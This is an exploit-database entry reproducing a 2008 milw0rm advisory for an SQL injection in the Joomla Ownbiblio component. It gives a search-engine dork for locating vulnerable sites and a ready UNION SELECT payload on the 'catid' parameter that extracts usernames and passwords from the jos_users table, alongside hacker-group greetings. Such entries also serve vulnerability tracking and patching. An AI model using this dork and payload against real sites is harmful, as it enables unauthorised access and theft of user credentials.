header-logo
Suggest Exploit
vendor:
Ownbiblio
by:
H!tm@N
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ownbiblio
Affected Version From: 1.5.2003
Affected Version To: 1.5.2003
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component Ownbiblio SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'catid' in the 'index.php' script. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Ensure that user-supplied input is validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

#############################################################################
#							                    #
#          Joomla Component Ownbiblio SQL Injection Vulnerability           #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Ownbiblio (com_ownbiblio)"
[~] Version:       "1.5.3" 
[~] Author:        "Sebastian Kruvinnus, Michael Kehrwecker"

########################################

[~] DORK: inurl:"com_ownbiblio" catalogue

########################################

[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL]
[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2008-10-11]

Navigation

Suggest Exploit

Services By CQR